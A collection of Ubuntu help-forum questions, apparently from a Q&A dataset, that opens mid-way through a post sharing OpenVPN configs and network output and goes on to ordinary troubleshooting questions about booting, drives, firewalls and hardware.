not function # unless you partially or fully disable # the firewall for the tun/tap interface . ; dev tap dev tun # windows needs the tap-win32 adapter name # from the network connections panel if you # have more than one . on xp sp2 or higher , # you may need to selectively disable the # windows firewall for the tap adapter . # non-windows systems usually do n't need this . ; dev-node mytap # ssl/tls root certificate ( ca ) , certificate # ( cert ) , and private key ( key ) . each client # and the server must have their own cert and # key file . the server and all clients will # use the same ca file . # # see the `` easy-rsa '' directory for a series # of scripts for generating rsa certificates # and private keys . remember to use # a unique common name for the server # and each of the client certificates . # # any x509 key management system can be used . # openvpn can also use a pkcs # 12 formatted key file # ( see `` pkcs12 '' directive in man page ) . ca ca.crt cert server.crt key server.key # this file should be kept secret # diffie hellman parameters . # generate your own with : # openssl dhparam -out dh1024.pem 1024 # substitute 2048 for 1024 if you are using # 2048 bit keys . dh dh1024.pem # configure server mode and supply a vpn subnet # for openvpn to draw client addresses from . # the server will take 10.8.0.1 for itself , # the rest will be made available to clients . # each client will be able to reach the server # on 10.8.0.1 . comment this line out if you are # ethernet bridging . see the man page for more info . server 10.8.0.0 255.255.255.0 # maintain a record of client < - > virtual ip address # associations in this file . if openvpn goes down or # is restarted , reconnecting clients can be assigned # the same virtual ip address from the pool that was # previously assigned . ifconfig-pool-persist ipp.txt # configure server mode for ethernet bridging . # you must first use your os 's bridging capability # to bridge the tap interface with the ethernet # nic interface . then you must manually set the # ip/netmask on the bridge interface , here we # assume 10.8.0.4/255.255.255.0 . finally we # must set aside an ip range in this subnet # ( start=10.8.0.50 end=10.8.0.100 ) to allocate # to connecting clients . leave this line commented # out unless you are ethernet bridging . ; server-bridge 10.8.0.4 255.255.255.0 10.8.0.50 10.8.0.100 # configure server mode for ethernet bridging # using a dhcp-proxy , where clients talk # to the openvpn server-side dhcp server # to receive their ip address allocation # and dns server addresses . you must first use # your os 's bridging capability to bridge the tap # interface with the ethernet nic interface . # note : this mode only works on clients ( such as # windows ) , where the client-side tap adapter is # bound to a dhcp client . ; server-bridge # push routes to the client to allow it # to reach other private subnets behind # the server . remember that these # private subnets will also need # to know to route the openvpn client # address pool ( 10.8.0.0/255.255.255.0 ) # back to the openvpn server . ; push `` route 192.168.10.0 255.255.255.0 '' ; push `` route 192.168.20.0 255.255.255.0 '' # to assign specific ip addresses to specific # clients or if a connecting client has a private # subnet behind it that should also have vpn access , # use the subdirectory `` ccd '' for client-specific # configuration files ( see man page for more info ) . # example : suppose the client # having the certificate common name `` thelonious '' # also has a small subnet behind his connecting # machine , such as 192.168.40.128/255.255.255.248 . # first , uncomment out these lines : ; client-config-dir ccd ; route 192.168.40.128 255.255.255.248 # then create a file ccd/thelonious with this line : # iroute 192.168.40.128 255.255.255.248 # this will allow thelonious ' private subnet to # access the vpn . this example will only work # if you are routing , not bridging , i.e . you are # using `` dev tun '' and `` server '' directives . # example : suppose you want to give # thelonious a fixed vpn ip address of 10.9.0.1 . # first uncomment out these lines : ; client-config-dir ccd ; route 10.9.0.0 255.255.255.252 # then add this line to ccd/thelonious : # ifconfig-push 10.9.0.1 10.9.0.2 # suppose that you want to enable different # firewall access policies for different groups # of clients . there are two methods : # ( 1 ) run multiple openvpn daemons , one for each # group , and firewall the tun/tap interface # for each group/daemon appropriately . # ( 2 ) ( advanced ) create a script to dynamically # modify the firewall in response to access # from different clients . see man # page for more info on learn-address script . ; learn-address ./script # if enabled , this directive will configure # all clients to redirect their default # network gateway through the vpn , causing # all ip traffic such as web browsing and # and dns lookups to go through the vpn # ( the openvpn server machine may need to nat # or bridge the tun/tap interface to the internet # in order for this to work properly ) . ; push `` redirect-gateway def1 bypass-dhcp '' # certain windows-specific network settings # can be pushed to clients , such as dns # or wins server addresses . caveat : # http : //openvpn.net/faq.html # dhcpcaveats # the addresses below refer to the public # dns servers provided by opendns.com . ; push `` dhcp-option dns 208.67.222.222 '' ; push `` dhcp-option dns 208.67.220.220 '' # uncomment this directive to allow different # clients to be able to `` see '' each other . # by default , clients will only see the server . # to force clients to only see the server , you # will also need to appropriately firewall the # server 's tun/tap interface . ; client-to-client # uncomment this directive if multiple clients # might connect with the same certificate/key # files or common names . this is recommended # only for testing purposes . for production use , # each client should have its own certificate/key # pair . # # if you have not generated individual # certificate/key pairs for each client , # each having its own unique `` common name '' , # uncomment this line out . ; duplicate-cn # the keepalive directive causes ping-like # messages to be sent back and forth over # the link so that each side knows when # the other side has gone down . # ping every 10 seconds , assume that remote # peer is down if no ping received during # a 120 second time period . keepalive 10 120 # for extra security beyond that provided # by ssl/tls , create an `` hmac firewall '' # to help block dos attacks and udp port flooding . # # generate with : # openvpn -- genkey -- secret ta.key # # the server and each client must have # a copy of this key . # the second parameter should be '0' # on the server and '1 ' on the clients . ; tls-auth ta.key 0 # this file is secret # select a cryptographic cipher . # this config item must be copied to # the client config file as well . ; cipher bf-cbc # blowfish ( default ) ; cipher aes-128-cbc # aes ; cipher des-ede3-cbc # triple-des # enable compression on the vpn link . # if you enable it here , you must also # enable it in the client config file . comp-lzo # the maximum number of concurrently connected # clients we want to allow . ; max-clients 100 # it 's a good idea to reduce the openvpn # daemon 's privileges after initialization . # # you can uncomment this out on # non-windows systems . ; user nobody ; group nogroup # the persist options will try to avoid # accessing certain resources on restart # that may no longer be accessible because # of the privilege downgrade . persist-key persist-tun # output a short status file showing # current connections , truncated # and rewritten every minute . status openvpn-status.log # by default , log messages will go to the syslog ( or # on windows , if running as a service , they will go to # the `` \program files\openvpn\log '' directory ) . # use log or log-append to override this default . # `` log '' will truncate the log file on openvpn startup , # while `` log-append '' will append to it . use one # or the other ( but not both ) . ; log openvpn.log ; log-append openvpn.log # set the appropriate level of log # file verbosity . # # 0 is silent , except for fatal errors # 4 is reasonable for general usage # 5 and 6 can help to debug connection problems # 9 is extremely verbose verb 3 # silence repeating messages . at most 20 # sequential messages of the same message # category will be output to the log . ; mute 20 push `` redirect-gateway def1 '' client.conf # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # sample client-side openvpn 2.0 config file # # for connecting to multi-client server . # # # # this configuration can be used by multiple # # clients , however each client should have # # its own cert and key files . # # # # on windows , you might want to rename this # # file so it has a .ovpn extension # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # specify that we are a client and that we # will be pulling certain config file directives # from the server . client # use the same setting as you are using on # the server . # on most systems , the vpn will not function # unless you partially or fully disable # the firewall for the tun/tap interface . ; dev tap dev tun # windows needs the tap-win32 adapter name # from the network connections panel # if you have more than one . on xp sp2 , # you may need to disable the firewall # for the tap adapter . ; dev-node mytap # are we connecting to a tcp or # udp server ? use the same setting as # on the server . ; proto tcp proto udp # the hostname/ip and port of the server . # you can have multiple remote entries # to load balance between the servers . remote xxx.xxx.xxx.xxx 1194 ; remote my-server-2 1194 # choose a random host from the remote # list for load-balancing . otherwise # try hosts in the order specified . ; remote-random # keep trying indefinitely to resolve the # host name of the openvpn server . very useful # on machines which are not permanently connected # to the internet such as laptops . resolv-retry infinite # most clients do n't need to bind to # a specific local port number . nobind # downgrade privileges after initialization ( non-windows only ) ; user nobody ; group nogroup # try to preserve some state across restarts . persist-key persist-tun # if you are connecting through an # http proxy to reach the actual openvpn # server , put the proxy server/ip and # port number here . see the man page # if your proxy server requires # authentication . ; http-proxy-retry # retry on connection failures ; http-proxy [ proxy server ] [ proxy port # ] # wireless networks often produce a lot # of duplicate packets . set this flag # to silence duplicate packet warnings . ; mute-replay-warnings # ssl/tls parms . # see the server config file for more # description . it 's best to use # a separate .crt/.key file pair # for each client . a single ca # file can be used for all clients . ca ca.crt cert client.crt key client.key # verify server certificate by checking # that the certicate has the nscerttype # field set to `` server '' . this is an # important precaution to protect against # a potential attack discussed here : # http : //openvpn.net/howto.html # mitm # # to use this feature , you will need to generate # your server certificates with the nscerttype # field set to `` server '' . the build-key-server # script in the easy-rsa folder will do this . ns-cert-type server # if a tls-auth key is used on the server # then every client must also have the key . ; tls-auth ta.key 1 # select a cryptographic cipher . # if the cipher option is used on the server # then you must also specify it here . ; cipher x # enable compression on the vpn link . # do n't enable this unless it is also # enabled in the server config file . comp-lzo # set log file verbosity . verb 3 # silence repeating messages ; mute 20 iptables -l root @ server : ~ # iptables -l chain input ( policy accept ) target prot opt source destination as0_accept all -- anywhere anywhere state related , established as0_accept all -- anywhere anywhere as0_in_pre all -- anywhere anywhere mark match 0x2000000/0x2000000 as0_accept udp -- anywhere server state new udp dpt : openvpn as0_accept tcp -- anywhere server state new tcp dpt : https as0_webaccept all -- anywhere anywhere state related , established as0_webaccept tcp -- anywhere server state new tcp dpt:943 chain forward ( policy accept ) target prot opt source destination as0_accept all -- anywhere anywhere state related , established as0_in_pre all -- anywhere anywhere mark match 0x2000000/0x2000000 as0_out_s2c all -- anywhere anywhere accept all -- anywhere anywhere state related , established accept all -- 10.8.0.0/24 anywhere reject all -- anywhere anywhere reject-with icmp-port-unreachable chain output ( policy accept ) target prot opt source destination as0_out_local all -- anywhere anywhere chain as0_accept ( 5 references ) target prot opt source destination accept all -- anywhere anywhere chain as0_in ( 4 references ) target prot opt source destination accept all -- anywhere 5.5.0.1 accept all -- anywhere localnet/24 as0_in_post all -- anywhere anywhere chain as0_in_post ( 1 references ) target prot opt source destination as0_out all -- anywhere anywhere drop all -- anywhere anywhere chain as0_in_pre ( 2 references ) target prot opt source destination as0_in all -- anywhere 5.5.0.0/20 as0_in all -- anywhere 192.168.0.0/16 as0_in all -- anywhere 172.16.0.0/12 as0_in all -- anywhere 10.0.0.0/8 accept all -- anywhere anywhere chain as0_out ( 2 references ) target prot opt source destination drop all -- anywhere anywhere chain as0_out_local ( 1 references ) target prot opt source destination drop icmp -- anywhere anywhere icmp redirect accept all -- anywhere anywhere chain as0_out_s2c ( 1 references ) target prot opt source destination as0_out all -- anywhere anywhere chain as0_webaccept ( 2 references ) target prot opt source destination accept all -- anywhere anywhere sysctl.conf # uncomment the next line to enable packet forwarding for ipv4 net.ipv4.ip_forward=1 ifconfig - with openvpn running root @ server : ~ # ifconfig as0t0 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:5.5.0.1 p-t-p:5.5.0.1 mask:255.255.248.0 up pointopoint running noarp multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:200 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) eth0 link encap : ethernet hwaddr 00:01:6c:2d : be:00 inet addr:192.168.1.5 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :201:6cff : fe2d : be00/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:28831661 errors:0 dropped:65539 overruns:0 frame:0 tx packets:25344300 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:27763144851 ( 27.7 gb ) tx bytes:19771050493 ( 19.7 gb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:744868 errors:0 dropped:0 overruns:0 frame:0 tx packets:744868 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:208557442 ( 208.5 mb ) tx bytes:208557442 ( 208.5 mb ) tun0 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:10.8.0.1 p-t-p:10.8.0.2 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1500 metric:1 rx packets:5608 errors:0 dropped:0 overruns:0 frame:0 tx packets:5892 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 rx bytes:1018432 ( 1.0 mb ) tx bytes:4512967 ( 4.5 mb ) ifconfig - without openvpn running root @ server : ~ # ifconfig as0t0 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:5.5.0.1 p-t-p:5.5.0.1 mask:255.255.248.0 up pointopoint running noarp multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:200 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) eth0 link encap : ethernet hwaddr 00:01:6c:2d : be:00 inet addr:192.168.1.5 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :201:6cff : fe2d : be00/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:28833221 errors:0 dropped:65539 overruns:0 frame:0 tx packets:25345463 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:27763517926 ( 27.7 gb ) tx bytes:19771192727 ( 19.7 gb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:744948 errors:0 dropped:0 overruns:0 frame:0 tx packets:744948 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:208569802 ( 208.5 mb ) tx bytes:208569802 ( 208.5 mb ) netstat -rn - with openvpn running root @ server : ~ # netstat -rn kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 5.5.0.0 0.0.0.0 255.255.248.0 u 0 0 0 as0t0 10.8.0.0 10.8.0.2 255.255.255.0 ug 0 0 0 tun0 10.8.0.2 0.0.0.0 255.255.255.255 uh 0 0 0 tun0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 netstat -rn - without openvpn running root @ server : ~ # netstat -rn kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 5.5.0.0 0.0.0.0 255.255.248.0 u 0 0 0 as0t0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 if anyone can help please do ... thanks in advance .
428754	keyboard not working with 13.10	i have installed 13.10 64bit using a live disk after installing my keyboard does not respond until i disconnect and reconnect it . i have tried all of the suggestions in the bios but to no effect . the mouse and network both work perfectly only the keyboard dell sk8315 fails to work this happens every time i boot into ubuntu or use the try option form the disk . my machine is a self built machine based on an asus sabertooth 990fx r2.0 board . the mouse and keyboard are running through a aten automatic kvm switch but because the mouse still works i do not think this has anything to do with the problem . i am a total noob to linux so have no idea about switches or using the terminal . please help ?
428755	overheating dell inspiron n5010	i have a dell inspiron n5010 laptop with ubuntu 12.10 64 bit os , the only problem i have is the overheating of my cpu . i think that this is related to the usage of the cpu fan . how can i fix it ?
428756	try ubuntu 13.10 from usb not showing all drives	i 'm booting from a usb drive and selected the option try ubuntu ( ubuntu 13.10 ) . once it starts , it is showing only 2 partitions , the one where windows is installed and the other as unlabeled ( this partition is shown as empty ) . i have windows installed in c : , d : and f : drives contain my data which are not being shown . i tried the command : sudo fdisk -l and got the following message : ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xe0000000 device boot start end blocks id system /dev/sda1 63 257039 128488+ de dell utility partition 1 does not start on physical sector boundary . /dev/sda2 257040 262143 2552 42 sfs /dev/sda3 * 262144 20979711 10358784 42 sfs /dev/sda4 20979712 276979711 128000000 42 sfs disk /dev/sdb : 16.1 gb , 16131293184 bytes 255 heads , 63 sectors/track , 1961 cylinders , total 31506432 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdb1 * 51248 31506430 15727591+ c w95 fat32 ( lba ) ubuntu @ ubuntu : ~ $ i have a hard disk of 320 gb capacity , which is shown in this message , but why are n't the other drives ( d : and f : ) being displayed ?
428760	fan is constantly on when plugged , but goes silent when only on battery	problem fan is constantly on when a laptop is plugged and not charging . not noisy , but definitely audible . however , it occasionally stays silent ( spinning slower or not spinning at all ) when laptop is not plugged or still charging . question how to achieve the same when the machine stays plugged and is n't charging ? perhaps the solution is as simple as this : http : //askubuntu.com/a/300921/69296 machine : hp elitebook 8470p ubuntu 13.10 lts ( clean install , actually lubuntu flavour , but it does n't make a difference ) intel i5-3360m uname -a : linux elite 3.11.0-12-generic # 19-ubuntu smp wed oct 9 16:20:46 utc 2013 x86_64 x86_64 x86_64 gnu/linux 8gb ram sata3 ssd amd radeon hd 7570m power_method : profile , power_profile : auto
428764	windows that pop up appear behind active window ?	i am using firefox and when i finish downloading a file , i click on the folder icon beside its name . the problem is , the windows appear behind firefox . it 's not isolated to the viewing the destination folder though . since , for example , transmission ( torrent client ) is running on the top tray , when i click on it then show transmission , the window opens behind firefox also . i want to know how to fix this ?
428765	why are certain things able to get through ufw firewall ?	i should say up-front that i am totally new to linux , ubuntu , and the technical side of networking . i am setting up ubuntu on a server computer and have learned a bit about configuring the ufw firewall . i have set ufw to block all ports by default ( sudo ufw default deny ) and so far have added rules to open a couple of ports for ssh and game servers , but there is one thing i do n't understand . how is it that i am still able to update packages , ping ip addresses , etc . if ufw is supposedly blocking all ( or almost all ) of the ports ? does ufw automatically allow traffic back from an ip address that i have connected to ? i 'm sure there is a simple technical explanation but i 'm having trouble finding it via google . thank you !
428768	having problems with adobe flash	i am a new user to the ubuntu os and want to do everything to understand it 's complete functionality . recently i have read so much about it . i have the 12.04 lts 32bits running on my hp 430 laptop . installing programs that i like from bloggers and articles on youtube . but i have a big problem installing the adobe flash player . like for instance , the global flash settings page does n't show with java embeds , rather all i see is just texts and a message saying this page needs adobe flash install . i will appreciate if someone help me get over this problem . thanks .
428771	mounting /opt/mongo on new partition or resize primary partition on vmware server	i was assigned to add space to our virtual machine running ubutnu 12.04 lts . our provider increased disk space in vmware and i now need to expand it from the system . the server has only one primary partition on which system is located . i now need to add existing free space to the system . i dont have access to vmware administration , so i ca n't insert a live cd and do it from there , but even if a could , i belive that that involves a risk of losing data , which i can not afford , since this is a prodction server . most of the current space is used by mongo database . so i came up with two teoretical solutions : 1 ) find a way to extend primary partition without risk of losing data ( maybe make it a lvm partition and add it to the group , but i have not been able to find out wheather this is possible with existing partition ) 2 ) mount free space to the mongo database directory , so that all mongo files are located on this partition . the directory is in /opt/mongo . this would , however , involve preserving paths to the files that are alerady in this directory and `` moving '' them onto the new partition , deleting them on the old partition . i 'm worried that simple mv to a temp dir and moving back after mount will breake the database . can someone help me achive one of these given options ? ( or suggest a better one ? ) i 'll be forever in your debt : - ) many thanks !
428772	how to install specific version of some package ?	my questions are divided into two parts : how to know the version of installed package ? how to install a specific package version ?
428774	touchpad and speakers are not working in ubuntu13.04	i am using ubuntu 13.04.my touchpad and internal speakers are not working.i had tried using external mouse but still there is no use.i had tried with ubuntu 12.10 in a usb drive , it works fine with it . regards ,
428779	start up disk errors	hey guys i am currently using ubuntu 12.04lts and i do have a problem with my strat up disk creator right now . when i tried to create a live usb for kali linux the iso file just could not be seen and when i tried another os iso file ( tails ) they would show me this error an uncaught exception was raised : [ errno 5 ] input/output error btw i am a new to linux and before this never encounted this kind of error before though . thanks in advance !
428780	usb 2-1.4 : ca n't set config # 1 , error -110	i am trying to connect my android galaxy s2 device using mtp . i have tried all the methods in http : //askubuntu.com/a/247046/112042 , but i can not access my device file system using mtp . here is the message that i get , each time i try to connect my device . mar 3 10:17:15 g-e420-45 kernel : [ 3021.224138 ] usb 2-1.4 : new high-speed usb device number 20 using ehci_hcd mar 3 10:17:20 g-e420-45 kernel : [ 3026.309361 ] usb 2-1.4 : ca n't set config # 1 , error -110 and when i disconnect , i get the following message . mar 3 10:18:32 g-e420-45 kernel : [ 3097.981202 ] usb 2-1.4 : usb disconnect , device number 20 mar 3 10:18:32 g-e420-45 kernel : [ 3098.184342 ] usb 2-1.4 : new high-speed usb device number 21 using ehci_hcd mar 3 10:18:32 g-e420-45 mtp-probe : checking bus 2 , device 21 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4 '' mar 3 10:18:37 g-e420-45 mtp-probe : bus : 2 , device : 21 was not an mtp device mar 3 10:18:37 g-e420-45 kernel : [ 3103.273890 ] usb 2-1.4 : ca n't set config # 1 , error -110 could someone help me understand whats going wrong ? update : i was using cyanogenmod 10.2 when i noticed the above error , so i updated to the latest nightly rom available and now i see the following error when i try to connect as mtp , mar 3 13:31:33 g-e6420-45 kernel : [ 8577.174379 ] usb 2-1.4 : new high-speed usb device number 12 using ehci_hcd mar 3 13:31:33 g-e6420-45 ntfs-3g [ 4898 ] : ntfs_attr_pread_i : ntfs_pread failed : input/output error mar 3 13:31:33 g-e6420-45 ntfs-3g [ 4898 ] : failed to read vcn 0x2 : input/output error mar 3 13:31:33 g-e6420-45 kernel : [ 8577.395783 ] quiet_error : 6 callbacks suppressed mar 3 13:31:33 g-e6420-45 kernel : [ 8577.395793 ] buffer i/o error on device sdb1 , logical block 173563615 mar 3 13:31:33 g-e6420-45 ntfs-3g [ 4898 ] : ntfs_attr_pread_i : ntfs_pread failed : input/output error mar 3 13:31:33 g-e420-45 ntfs-3g [ 4898 ] : failed to read vcn 0x2 : input/output error mar 3 13:31:33 g-e420-45 kernel : [ 8577.396116 ] buffer i/o error on device sdb1 , logical block 173563615 mar 3 13:31:34 g-e420-45 ntfs-3g [ 4898 ] : ntfs_attr_pread_i : ntfs_pread failed : input/output error mar 3 13:31:34 g-e420-45 ntfs-3g [ 4898 ] : failed to read vcn 0x2 : input/output error mar 3 13:31:34 g-e420-45 ntfs-3g [ 4898 ] : ntfs_attr_pread_i : ntfs_pread failed : input/output error mar 3 13:31:34 g-e420-45 ntfs-3g [ 4898 ] : failed to read vcn 0x2 : input/output error mar 3 13:31:34 g-e420-45 kernel : [ 8577.681100 ] buffer i/o error on device sdb1 , logical block 173563615 mar 3 13:31:34 g-e420-45 kernel : [ 8577.681363 ] buffer i/o error on device sdb1 , logical block 173563615
428781	wrong file system type passed to fsck	my ubuntu hanged today while it was downloading , as it was unresponsive for long i shut it down forcefully . later when i switched it on , it was not coming up so i used a live cd to fix the file system after googling for a while i executed following command sudo fsck -t etx3 -y /dev/sda1 everything seemed fine it ended with filesystem was modified something like that , but then i realised my filesystem was ext4 and i passed ext3 to fsck -t option . i was worried that i might have corrupted my entire filesystem but later when i restarted everything was working fine except for my internet connection . my system was connected to wifi but i was not able to resolve any ip address , i tried chrome & firefox but no use . i even tried curl but it too could n't resolve address . but my torrent client was working and downloading properly ( this is y i assumed my internet connection is working ) . apart from this i do n't think my system is behaving properly it freezes in between and i have to restart again . this internet thing may be a coincidence , but my question is did i messed up my filesystem by passing wrong option to fsck -t , if so how can i fix it . pls help
428783	base 4.2.1 does not display access database connection option	i am a relatively new user to ubuntu . i would like to open access database in ubunutu to view the tables but can not use wine/ms office . i have installed libreoffice 4.2.1 alongwith base . problem is that when trying to connect to an existing database , the option to use access is not displayed . displayed options are jdbc , oracle jdbc , thunderbird address book , spreadsheet , dbase , text , mysql , odbc libre office version 4.2.1 , mdbtools is installed . regards , ali
428788	streaming music like a radio show	i 'd like to be able to stream music , realtime , to a friend . not in my lan , but over the internet . i 've done a lot of research on how to do this , one option was setting up a shoutcast server , but that is n't realtime as far as i know . vlc allows streaming , but again , this is not realtime . i ca n't imagine this being so hard to do . i did a lot of research , and the `` best '' solution i could find was to use teamspeak with a music player plugin . it would be soo much more convenient though if i could just open rythmbox and start a stream , in which someone else could join and listen .
428789	uefi boot in virtualbox - ubuntu 12.04	i am trying to boot ubuntu 12.04 ( 64bit ) by using uefi in virtualbox . when using uefi boot in virtualbox , i instantly get dropped into efi-shell . i looked this up online and did as explained in this thread . when i do as explained in the thread , i get `` efidisk read error '' . despite this error , it somehow still boots into ubuntu , but i end up in tty1 . i have tried this to avoid getting dropped into efi-shell without any success . why does `` efidisk read error '' appear ? how do i boot directly into ubuntu without moving to efi-shell ? how do i get into lightdm from tty1 ?
428790	stalling at the boot screen with the orange dots	i got to work this morning and launched my machine as usual , and ubuntu has decided it does n't want to launch . it just gets to the launch screen and keeps cycling the orange dots . when i press the esc key it is saying ( i 'm summarizing as i am posting this from my phone ) : /etc/acpi/power.sh : pm-powersave : not found ... starting cpu interrupts balancing daemon [ fail ] ... starting lightdm display manager [ fail ] ... starting mysql server [ fail ] lines i have omitted are reporting ok . i do have a live usb which i can boot into . i just ca n't get network access due to the ethernet driver not being on the live usb . i have the driver files on there if that helps . i can boot into windows 7 just fine .
428791	unable to boot ubuntu 12.04 after fresh install	i installed ubuntu 12.04 on my laptop and it is the only operating system installed . unfortunately i am unable to get it to boot . after installing it a dialog pops up and asks me to reboot . afterwards i only see a blinking cursor on a black background . what did i try so far : 1 ) boot order : usb is first , hdd second . when i boot the usb is not connected 2 ) holding shift to show grub while booting does not work 3 ) following instructions on the help page to repair boot did not work either . http : //help.ubuntu.com/community/boot-repair the output log can be found here : http : //paste.ubuntu.com/7026581/ help is very much appreciated . update on danatela 's comment i followed instructions found here : my computer boots to a black screen , what options do i have to fix it ? 1 ) the hash of the iso file is correct . 2 ) verifying the cd/dvd integrity ( it 's a bootable usb drive ) -- the output is : `` check finished : errors found in 1 file ! '' i tried with two different usb sticks and they both show the same error . i wonder why the md5 checksum is correct but one file contains an error .
428794	dual boot ubuntu 12.04 and windows 8 - getting efi disk read error	i am new to this dual booting and linux thing . at first i got pre-installed windows 8 laptop with uefi thing ( i heard its mess for dual booting ) i wanted to try linux and its pretty cool : ) i downloaded the elementary os : luna ( based on ubuntu 12.04 ) 64 bit version and made its liveusb then i disabled secure boot from boot menu . then installed elementary os . everything went cool but i was unable to get a choosing menu . i was directly going into elementary os but no option for windows 8 . then i installed boot repair tool and i got message as `` efi detected . please check the option '' ( i did n't knew what this meant , so i just ignored it ) before doing anything i took a boot info summary : http : //paste.ubuntu.com/7026387 and after that i selected recommended repair and after that boom ! i ca n't even use elementary os and neither windows 8 after restart . the boot info summary after applying recommended repair : http : //paste.ubuntu.com/7026422 after restart i see three lines of efi read error like something and then something grub , minimal ... with a `` grub > `` after that . dunno what is this . my laptop : samsung series 5 np550p5c right now i am using liveusb : p advance thanks !
428799	files not readable on windows	i have a video server running ubuntu 12.04.3 lts , which works fine for what i need it to do . although , as it is a video server from which i stream movies to my windows machine , that 's what i expect it to do . the last time i watched a movie using this method , was yesterday , when i could watch the movie without any issues whatsoever . although now , i tried opening a .mp4 video file and a .vob file , having tried both in vlc and in windows media player . neither worked , vlc gave me the error `` bad file descriptor '' and wmp simply stated that the file could not be opened . i tried opening the .mp4 file which i viewed yesterday , which did n't work anymore either . is there anyone who knows what may be causing this issue and/or how to fix it ? thanks in advance .
428800	â/usr/bin/ld : can not find -lboost_python-mt '' installing pycuda 2011.2.2	trying to install pycuda i followed these instructions as i ran into that problem but unfortunately i am still getting the error : c++ -pthread -shared -wl , -bsymbolic-functions -wl , -bsymbolic-functions -wl , -z , relro -fno-strict-aliasing -dndebug -g -fwrapv -o2 -wall -wstrict-prototypes -d_fortify_source=2 -g -fstack-protector -- param=ssp-buffer-size=4 -wformat -werror=format-security build/temp.linux-x86_64-2.7/src/cpp/cuda.o build/temp.linux-x86_64-2.7/src/cpp/bitlog.o build/temp.linux-x86_64-2.7/src/wrapper/wrap_cudadrv.o build/temp.linux-x86_64-2.7/src/wrapper/mempool.o build/temp.linux-x86_64-2.7/src/wrapper/wrap_curand.o -l/usr/local/cuda/lib -l/usr/local/cuda/lib64 -lboost_python-mt-py27 -lboost_thread-mt -lcuda -lcurand -o build/lib.linux-x86_64-2.7/pycuda/_driver.so /usr/bin/ld : can not find -lboost_python-mt-py27 /usr/bin/ld : can not find -lboost_thread-mt /usr/bin/ld : skipping incompatible /usr/local/cuda/lib/libcurand.so when searching for -lcurand collect2 : error : ld returned 1 exit status error : command 'c++ ' failed with exit status 1 make : *** [ install ] error 1 i found the linking file libboost_python-mt in /usr/lib/ but it seems referencing /usr/lib/libboost_python-mt-py26 which does not exist . though /usr/lib/libboost_python-mt-py27 does .. can anybody help me here ?
428801	setting screensaver through domain	i am using windows server 2003 and there are a lot of machines in my domain . 75 % of the machines are dual boot systems . using both windows and ubuntu in same windows domain . now i can push screensavers in only windows hosts through the domain , and the screensaver format is .scr ( the default file extension for windows screensavers ) . is there any way to push the same screensavers to linux hosts also ? please help to support this query .
428802	internet connection problems possible dns	running vers . 13.10 . over a wifi connection to a home adsl router , dhcp . all working fine for 1 week after new ubuntu installation . try connecting to the internet , being told pages not available . wifi access and other connected devices ( this android tablet for example ) are fine . checked ufw firewall ( disabled ) and tried pinging a few ip addresses without any joy . subsequently , logged on the ubuntu laptop using the guest account , fired up firefox and connected and was able to surf happily ... .for about 5 mins then same thing.now unable to connect using either my account ( with chrome ) or the guest account with firefox . all other household devices using the same internet connection are all fine . cat /etc/resolv.conf shows : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) ... . # do not edit etc ... nameserver 127.0.1.1 search domain.name
428804	problem booting up after upgrade	i am a novice in regards to the backend of computers ! i have encountered the following problem . i updated 12.04.4 ( lts ) and the unity interface has disappeared . once the update was finished , i was asked to restart the system and i did . when the machine booted up , the unity interface flickers and goes straight to : ubuntu 12.04.4 lts < computer name > tty1 < computer name > login : i type in my password and nothing happens after i desperately want to get this fixed as i do not want to lose the data in the computer .
428805	prevent kubuntu from remembering previous session	if i shutdown pc while , for example , a konsole is opened , at the next boot kubuntu will load that konsole . this happens for each file/program opened . i do n't want this . is there a way to prevent it ?
